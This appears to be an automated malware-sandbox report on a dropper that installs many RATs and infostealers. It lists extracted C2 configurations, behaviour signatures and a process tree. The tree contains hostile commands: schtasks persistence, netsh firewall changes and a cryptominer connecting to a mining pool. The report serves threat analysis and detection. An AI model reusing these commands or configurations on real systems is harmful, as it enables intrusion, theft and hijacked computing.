Resubmissions

06-10-2023 19:40

231006-ydmxjsfe5s 10

07-08-2023 11:23

230807-ng6tqafa49 10

07-08-2023 11:15

230807-ncqlyagb9z 10

06-08-2023 21:35

230806-1fltdadf7y 10

24-07-2023 06:23

230724-g5yppabb61 10

24-07-2023 06:22

230724-g41snaaf98 10

05-07-2023 08:43

230705-kmlh7abc54 10

Analysis

  • max time kernel
    638s
  • max time network
    648s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    23-04-2022 12:02

General

  • Target

    RIP_YOUR_PC_LOL.exe

  • Size

    22.5MB

  • MD5

    52867174362410d63215d78e708103ea

  • SHA1

    7ae4e1048e4463a4201bdeaf224c5b6face681bf

  • SHA256

    37d8e1ce3b6e6488942717aa78cb54785edc985143bcc8d9ba9f42d73a3dbd7a

  • SHA512

    89e17e147d3f073e479e85d0b0321f6264bbc2aa84c930ed645e8f5cde3f1e58812c3db1ba0f10bee6ce7ac0731e1e3de6747a9b3c4d63a564dd8d904bd726ab

Malware Config

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    files.000webhost.com
  • Port:
    21
  • Username:
    fcb-aws-host-4

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

gfhhjgh.duckdns.org:8050

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_file

    system32.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

nanocore

Version

1.2.2.0

C2

172.98.92.42:58491

127.0.0.1:58491

Mutex

c5a0b6d8-d1f7-45cd-943b-d5fda411e988

Attributes
  • activate_away_mode

    true

  • backup_connection_host

    127.0.0.1

  • backup_dns_server

    8.8.4.4

  • buffer_size

    65535

  • build_time

    2021-09-20T02:48:09.651743436Z

  • bypass_user_account_control

    false

  • bypass_user_account_control_data

    PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2Ij8+DQo8VGFzayB2ZXJzaW9uPSIxLjIiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmRvd3MvMjAwNC8wMi9taXQvdGFzayI+DQogIDxSZWdpc3RyYXRpb25JbmZvIC8+DQogIDxUcmlnZ2VycyAvPg0KICA8UHJpbmNpcGFscz4NCiAgICA8UHJpbmNpcGFsIGlkPSJBdXRob3IiPg0KICAgICAgPExvZ29uVHlwZT5JbnRlcmFjdGl2ZVRva2VuPC9Mb2dvblR5cGU+DQogICAgICA8UnVuTGV2ZWw+SGlnaGVzdEF2YWlsYWJsZTwvUnVuTGV2ZWw+DQogICAgPC9QcmluY2lwYWw+DQogIDwvUHJpbmNpcGFscz4NCiAgPFNldHRpbmdzPg0KICAgIDxNdWx0aXBsZUluc3RhbmNlc1BvbGljeT5QYXJhbGxlbDwvTXVsdGlwbGVJbnN0YW5jZXNQb2xpY3k+DQogICAgPERpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzPmZhbHNlPC9EaXNhbGxvd1N0YXJ0SWZPbkJhdHRlcmllcz4NCiAgICA8U3RvcElmR29pbmdPbkJhdHRlcmllcz5mYWxzZTwvU3RvcElmR29pbmdPbkJhdHRlcmllcz4NCiAgICA8QWxsb3dIYXJkVGVybWluYXRlPnRydWU8L0FsbG93SGFyZFRlcm1pbmF0ZT4NCiAgICA8U3RhcnRXaGVuQXZhaWxhYmxlPmZhbHNlPC9TdGFydFdoZW5BdmFpbGFibGU+DQogICAgPFJ1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+ZmFsc2U8L1J1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+DQogICAgPElkbGVTZXR0aW5ncz4NCiAgICAgIDxTdG9wT25JZGxlRW5kPmZhbHNlPC9TdG9wT25JZGxlRW5kPg0KICAgICAgPFJlc3RhcnRPbklkbGU+ZmFsc2U8L1Jlc3RhcnRPbklkbGU+DQogICAgPC9JZGxlU2V0dGluZ3M+DQogICAgPEFsbG93U3RhcnRPbkRlbWFuZD50cnVlPC9BbGxvd1N0YXJ0T25EZW1hbmQ+DQogICAgPEVuYWJsZWQ+dHJ1ZTwvRW5hYmxlZD4NCiAgICA8SGlkZGVuPmZhbHNlPC9IaWRkZW4+DQogICAgPFJ1bk9ubHlJZklkbGU+ZmFsc2U8L1J1bk9ubHlJZklkbGU+DQogICAgPFdha2VUb1J1bj5mYWxzZTwvV2FrZVRvUnVuPg0KICAgIDxFeGVjdXRpb25UaW1lTGltaXQ+UFQwUzwvRXhlY3V0aW9uVGltZUxpbWl0Pg0KICAgIDxQcmlvcml0eT40PC9Qcmlvcml0eT4NCiAgPC9TZXR0aW5ncz4NCiAgPEFjdGlvbnMgQ29udGV4dD0iQXV0aG9yIj4NCiAgICA8RXhlYz4NCiAgICAgIDxDb21tYW5kPiIjRVhFQ1VUQUJMRVBBVEgiPC9Db21tYW5kPg0KICAgICAgPEFyZ3VtZW50cz4kKEFyZzApPC9Bcmd1bWVudHM+DQogICAgPC9FeGVjPg0KICA8L0FjdGlvbnM+DQo8L1Rhc2s+

  • clear_access_control

    true

  • clear_zone_identifier

    false

  • connect_delay

    4000

  • connection_port

    58491

  • default_group

    Default

  • enable_debug_mode

    true

  • gc_threshold

    1.048576e+07

  • keep_alive_timeout

    30000

  • keyboard_logging

    false

  • lan_timeout

    2500

  • max_packet_size

    1.048576e+07

  • mutex

    c5a0b6d8-d1f7-45cd-943b-d5fda411e988

  • mutex_timeout

    5000

  • prevent_system_sleep

    false

  • primary_connection_host

    172.98.92.42

  • primary_dns_server

    8.8.8.8

  • request_elevation

    true

  • restart_delay

    5000

  • run_delay

    0

  • run_on_startup

    false

  • set_critical_process

    true

  • timeout_interval

    5000

  • use_custom_dns_server

    false

  • version

    1.2.2.0

  • wan_timeout

    8000

Extracted

Family

njrat

Version

im523

Botnet

mediaget

C2

kazya1.hopto.org:1470

Mutex

a797c6ca3f5e7aff8fa1149c47fe9466

Attributes
  • reg_key

    a797c6ca3f5e7aff8fa1149c47fe9466

  • splitter

    |'|'|

Extracted

Family

fickerstealer

C2

80.87.192.115:80

Extracted

Family

redline

Botnet

@zhilsholi

C2

yabynennet.xyz:81

Attributes
  • auth_value

    c2d0b7a2ede97b91495c99e75b4f27fb

Extracted

Family

pony

C2

http://londonpaerl.co.uk/yesup/gate.php

Extracted

Family

raccoon

Version

1.8.3-hotfix

Botnet

5781468cedb3a203003fdf1f12e72fe98d6f1c0f

Attributes
  • url4cnc

    http://194.180.174.53/brikitiki

    http://91.219.236.18/brikitiki

    http://194.180.174.41/brikitiki

    http://91.219.236.148/brikitiki

    https://t.me/brikitiki

rc4.plain
rc4.plain

Extracted

Family

azorult

C2

http://195.245.112.115/index.php

Extracted

Family

oski

C2

prepepe.ac.ug

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Detect PurpleFox Rootkit 6 IoCs

    Detect PurpleFox Rootkit.

  • Fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • HawkEye

    HawkEye is a malware kit that has seen continuous development since at least 2013.

  • NanoCore

    NanoCore is a remote access tool (RAT) with a variety of capabilities.

  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Process spawned unexpected child process 10 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • PurpleFox

    PurpleFox is an exploit kit used to distribute other malware families and first seen in 2018.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • UAC bypass 3 TTPs
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Async RAT payload 5 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • NirSoft MailPassView 7 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 7 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 11 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 47 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
  • Sets service image path in registry 2 TTPs
  • UPX packed file 11 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 11 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 4 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Uses the VBS compiler for execution 1 TTPs
  • Accesses Microsoft Outlook accounts 1 TTPs 2 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 14 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 11 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 12 IoCs
  • Drops file in Program Files directory 31 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 6 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 12 IoCs
  • Modifies registry class 2 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 4 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 12 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe
    "C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4488
    • C:\Users\Admin\AppData\Roaming\healastounding.exe
      "C:\Users\Admin\AppData\Roaming\healastounding.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:1708
      • C:\Users\Admin\AppData\Roaming\test.exe
        "C:\Users\Admin\AppData\Roaming\test.exe"
        3⤵
        • Executes dropped EXE
        PID:1620
      • C:\Users\Admin\AppData\Roaming\Opus.exe
        "C:\Users\Admin\AppData\Roaming\Opus.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Checks whether UAC is enabled
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4812
        • C:\Windows\SysWOW64\schtasks.exe
          "schtasks.exe" /create /f /tn "WPA Monitor" /xml "C:\Users\Admin\AppData\Local\Temp\tmpBD3A.tmp"
          4⤵
          • Creates scheduled task(s)
          PID:4612
        • C:\Windows\SysWOW64\schtasks.exe
          "schtasks.exe" /create /f /tn "WPA Monitor Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpDEFC.tmp"
          4⤵
          • Creates scheduled task(s)
          PID:4732
      • C:\Users\Admin\AppData\Roaming\a.exe
        "C:\Users\Admin\AppData\Roaming\a.exe"
        3⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Checks whether UAC is enabled
        • Suspicious use of AdjustPrivilegeToken
        PID:3924
      • C:\Users\Admin\AppData\Roaming\4.exe
        "C:\Users\Admin\AppData\Roaming\4.exe"
        3⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4876
        • C:\Users\Admin\AppData\Roaming\3.exe
          "C:\Users\Admin\AppData\Roaming\3.exe"
          4⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Adds Run key to start application
          • Checks whether UAC is enabled
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • System policy modification
          PID:3500
          • C:\Windows\System32\dosvc\RuntimeBroker.exe
            "C:\Windows\System32\dosvc\RuntimeBroker.exe"
            5⤵
            • Executes dropped EXE
            • Checks whether UAC is enabled
            • Suspicious use of AdjustPrivilegeToken
            • System policy modification
            PID:2480
      • C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
        "C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe"
        3⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Suspicious use of SetThreadContext
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4840
        • C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe
          "C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of SetWindowsHookEx
          PID:5016
          • C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe
            "C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe"
            5⤵
            • Executes dropped EXE
            PID:5072
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 5072 -s 1308
              6⤵
              • Program crash
              PID:5628
        • C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe
          "C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of SetWindowsHookEx
          PID:1776
          • C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe
            "C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe"
            5⤵
            • Executes dropped EXE
            PID:2736
        • C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
          "C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe"
          4⤵
          • Executes dropped EXE
          PID:5160
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 5160 -s 1188
            5⤵
            • Program crash
            PID:5916
      • C:\Users\Admin\AppData\Roaming\aaa.exe
        "C:\Users\Admin\AppData\Roaming\aaa.exe"
        3⤵
          PID:1728
          • C:\Users\Admin\AppData\Roaming\aaa.exe
            "C:\Users\Admin\AppData\Roaming\aaa.exe"
            4⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Accesses Microsoft Outlook accounts
            • Accesses Microsoft Outlook profiles
            • Suspicious use of AdjustPrivilegeToken
            • outlook_win_path
            PID:4200
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\240602281.bat" "C:\Users\Admin\AppData\Roaming\aaa.exe" "
              5⤵
                PID:5760
          • C:\Users\Admin\AppData\Roaming\gay.exe
            "C:\Users\Admin\AppData\Roaming\gay.exe"
            3⤵
            • Executes dropped EXE
            • Checks computer location settings
            PID:1192
            • C:\Users\Admin\AppData\Roaming\mediaget.exe
              "C:\Users\Admin\AppData\Roaming\mediaget.exe"
              4⤵
              • Executes dropped EXE
              • Drops startup file
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: GetForegroundWindowSpam
              • Suspicious use of AdjustPrivilegeToken
              PID:228
              • C:\Windows\SysWOW64\netsh.exe
                netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\mediaget.exe" "mediaget.exe" ENABLE
                5⤵
                  PID:3928
          • C:\Users\Admin\AppData\Roaming\Pluto Panel.exe
            "C:\Users\Admin\AppData\Roaming\Pluto Panel.exe"
            2⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of SetThreadContext
            • Suspicious use of AdjustPrivilegeToken
            PID:684
            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
              C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
              3⤵
              • Accesses Microsoft Outlook accounts
              PID:4880
            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
              C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
              3⤵
                PID:5576
            • C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
              "C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:3836
              • C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
                "C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"
                3⤵
                • Executes dropped EXE
                PID:3144
            • C:\Users\Admin\AppData\Roaming\22.exe
              "C:\Users\Admin\AppData\Roaming\22.exe"
              2⤵
              • Executes dropped EXE
              • Drops file in Windows directory
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:1904
              • C:\Windows\SysWOW64\netsh.exe
                netsh ipsec static add policy name=Block
                3⤵
                  PID:3840
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filterlist name=Filter1
                  3⤵
                    PID:4928
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                    3⤵
                      PID:4732
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                      3⤵
                        PID:5408
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                        3⤵
                          PID:5524
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                          3⤵
                            PID:5680
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                            3⤵
                              PID:5748
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                              3⤵
                                PID:5876
                              • C:\Windows\SysWOW64\netsh.exe
                                netsh ipsec static add filteraction name=FilteraAtion1 action=block
                                3⤵
                                  PID:5944
                                • C:\Windows\SysWOW64\netsh.exe
                                  netsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
                                  3⤵
                                    PID:6016
                                  • C:\Windows\SysWOW64\netsh.exe
                                    netsh ipsec static set policy name=Block assign=y
                                    3⤵
                                      PID:6080
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c del "C:\Users\Admin\AppData\Roaming\22.exe"
                                      3⤵
                                        PID:1584
                                    • C:\Users\Admin\AppData\Roaming\___11.19.exe
                                      "C:\Users\Admin\AppData\Roaming\___11.19.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Drops file in Program Files directory
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of SetWindowsHookEx
                                      • Suspicious use of WriteProcessMemory
                                      PID:5056
                                      • C:\Users\Admin\AppData\Local\Temp\svchos.exe
                                        C:\Users\Admin\AppData\Local\Temp\\svchos.exe
                                        3⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Drops file in System32 directory
                                        PID:548
                                      • C:\Users\Admin\AppData\Roaming\HD____11.19.exe
                                        C:\Users\Admin\AppData\Roaming\HD____11.19.exe
                                        3⤵
                                        • Executes dropped EXE
                                        PID:4720
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 660
                                          4⤵
                                          • Program crash
                                          PID:5272
                                  • C:\Users\Admin\AppData\Local\Temp\svchost.exe
                                    C:\Users\Admin\AppData\Local\Temp\\svchost.exe
                                    1⤵
                                    • Executes dropped EXE
                                    • Drops file in System32 directory
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2584
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\Admin\AppData\Local\Temp\svchost.exe > nul
                                      2⤵
                                        PID:5040
                                        • C:\Windows\SysWOW64\PING.EXE
                                          ping -n 2 127.0.0.1
                                          3⤵
                                          • Runs ping.exe
                                          PID:5272
                                    • C:\Windows\SysWOW64\svchost.exe
                                      C:\Windows\SysWOW64\svchost.exe -k "Ö÷¶¯·ÀÓù·þÎñÄ£¿é"
                                      1⤵
                                        PID:4040
                                      • C:\Windows\SysWOW64\svchost.exe
                                        C:\Windows\SysWOW64\svchost.exe -k "Ö÷¶¯·ÀÓù·þÎñÄ£¿é"
                                        1⤵
                                        • Loads dropped DLL
                                        • Drops file in System32 directory
                                        PID:696
                                        • C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe
                                          C:\Windows\system32\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe "c:\windows\system32\240568984.txt",MainThread
                                          2⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:1984
                                      • C:\Windows\SysWOW64\TXPlatforn.exe
                                        C:\Windows\SysWOW64\TXPlatforn.exe -auto
                                        1⤵
                                        • Executes dropped EXE
                                        PID:2440
                                        • C:\Windows\SysWOW64\TXPlatforn.exe
                                          C:\Windows\SysWOW64\TXPlatforn.exe -acsi
                                          2⤵
                                          • Drops file in Drivers directory
                                          • Executes dropped EXE
                                          • Suspicious behavior: LoadsDriver
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1636
                                      • C:\Windows\system32\taskmgr.exe
                                        "C:\Windows\system32\taskmgr.exe" /4
                                        1⤵
                                        • Checks SCSI registry key(s)
                                        • Checks processor information in registry
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious behavior: GetForegroundWindowSpam
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of FindShellTrayWindow
                                        • Suspicious use of SendNotifyMessage
                                        PID:752
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\ProgramData\Packages\Microsoft.549981C3F5F10_8wekyb3d8bbwe\S-1-5-21-1809750270-3141839489-3074374771-1000\backgroundTaskHost.exe'" /rl HIGHEST /f
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Creates scheduled task(s)
                                        PID:688
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Creates scheduled task(s)
                                        PID:1644
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\System32\dosvc\RuntimeBroker.exe'" /rl HIGHEST /f
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Creates scheduled task(s)
                                        PID:4340
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\Public\Downloads\System.exe'" /rl HIGHEST /f
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Creates scheduled task(s)
                                        PID:3644
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\System32\WUDFx02000\dwm.exe'" /rl HIGHEST /f
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Creates scheduled task(s)
                                        PID:4340
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Windows\Temp\Crashpad\reports\sppsvc.exe'" /rl HIGHEST /f
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Creates scheduled task(s)
                                        PID:3792
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4720 -ip 4720
                                        1⤵
                                          PID:5156
                                        • C:\Windows\System32\sihclient.exe
                                          C:\Windows\System32\sihclient.exe /cv tsIOm9yOXkCcIAmotD5hvg.0.2
                                          1⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1728
                                        • C:\Windows\Help\Winlogon.exe
                                          C:\Windows\Help\Winlogon.exe
                                          1⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Suspicious use of SetThreadContext
                                          PID:2456
                                          • C:\Windows\SysWOW64\svchost.exe
                                            C:\Windows\system32\svchost.exe
                                            2⤵
                                            • Drops file in Windows directory
                                            • Modifies data under HKEY_USERS
                                            • Suspicious use of SetWindowsHookEx
                                            PID:2792
                                            • C:\Windows\Cursors\WUDFhosts.exe
                                              C:\Windows\Cursors\WUDFhosts.exe -o pool.usa-138.com:80 -u 4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S -p x
                                              3⤵
                                              • Executes dropped EXE
                                              PID:884
                                          • C:\Windows\SysWOW64\svchost.exe
                                            C:\Windows\system32\svchost.exe
                                            2⤵
                                              PID:2004
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 416
                                              2⤵
                                              • Program crash
                                              PID:5612
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5072 -ip 5072
                                            1⤵
                                              PID:5536
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 2456 -ip 2456
                                              1⤵
                                                PID:3180
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5160 -ip 5160
                                                1⤵
                                                  PID:5928
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                  1⤵
                                                  • Enumerates system info in registry
                                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                  PID:6004
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe59ac4f50,0x7ffe59ac4f60,0x7ffe59ac4f70
                                                    2⤵
                                                      PID:6008
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1660 /prefetch:2
                                                      2⤵
                                                        PID:6036
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2056 /prefetch:8
                                                        2⤵
                                                          PID:2464
